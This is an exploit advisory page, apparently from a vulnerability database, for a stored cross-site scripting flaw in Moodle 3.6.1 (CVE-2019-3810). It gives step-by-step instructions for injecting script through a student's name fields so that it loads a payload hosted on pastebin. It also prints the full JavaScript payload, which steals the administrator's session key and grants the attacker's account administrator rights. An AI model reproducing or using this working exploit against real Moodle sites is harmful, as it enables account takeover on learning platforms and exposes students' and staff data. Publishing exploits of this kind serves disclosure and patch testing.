Moodle 3.6.1 Persistent Cross-Site Scripting (XSS)

2021.04.30
Credit: farisv
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS) # Date: 04/2021 # Exploit Author: farisv # Vendor Homepage: https://moodle.org/ # Software Link: https://download.moodle.org https://github.com/moodle/moodle/archive/refs/tags/v3.6.1.zip # Version: Moodle < 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16 # CVE: CVE-2019-3810 Moodle is a learning platform designed to provide educators, administrators, and learners with a single robust, secure and integrated system to create personalised learning environments. The following is PoC to use the XSS bug on /userpix/ (CVE-2019-3810) for privilege escalation from student to administrator. 1. Upload the XSS payload [1] to pastebin or other similar service. Change the value of userid to your own id. Let's say the URL is https://pastebin.com/raw/xxxxxxxx. 2. Login to your student account. 3. Set first name with: " style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement 4. Set surname with: ('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS') 5. Ask the administrator to open /userpix/ page or put the link to that page on your post and wait. If successful, your account will be added as administrator. See the demonstration video on https://github.com/farisv/Moodle-CVE-2019-3810 [1] XSS Payload for privilege escalation on Moodle. Change the value of userid to your id. var webroot = '/'; var userid = '3'; var sesskey = ''; function get(path, success) { var xhr = new XMLHttpRequest(); xhr.open('GET', webroot + path); xhr.onreadystatechange = function() { if (xhr.readyState > 3 && xhr.status == 200) { success(xhr.responseText); } }; xhr.send(); return xhr; } function post(path, data, success) { var xhr = new XMLHttpRequest(); xhr.open('POST', webroot + path); xhr.onreadystatechange = function() { if (xhr.readyState > 3 && xhr.status == 200) { success(xhr.responseText); } }; xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send(encodeURI(data)); return xhr; } function setAdmin() { // Assign administrator access to userid bpath = 'admin/roles/admins.php'; data = "confirmadd=" + userid + "&sesskey=" + sesskey; post(bpath, data, function(data){}); } function getSesskey(data) { var sesskey_find = data.indexOf('"sesskey":"'); sesskey = data.substr(sesskey_find + 11, 10); setAdmin(); } function payload() { // We can find Sesskey inside JS script in main page get('', getSesskey); } // Start payload();


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top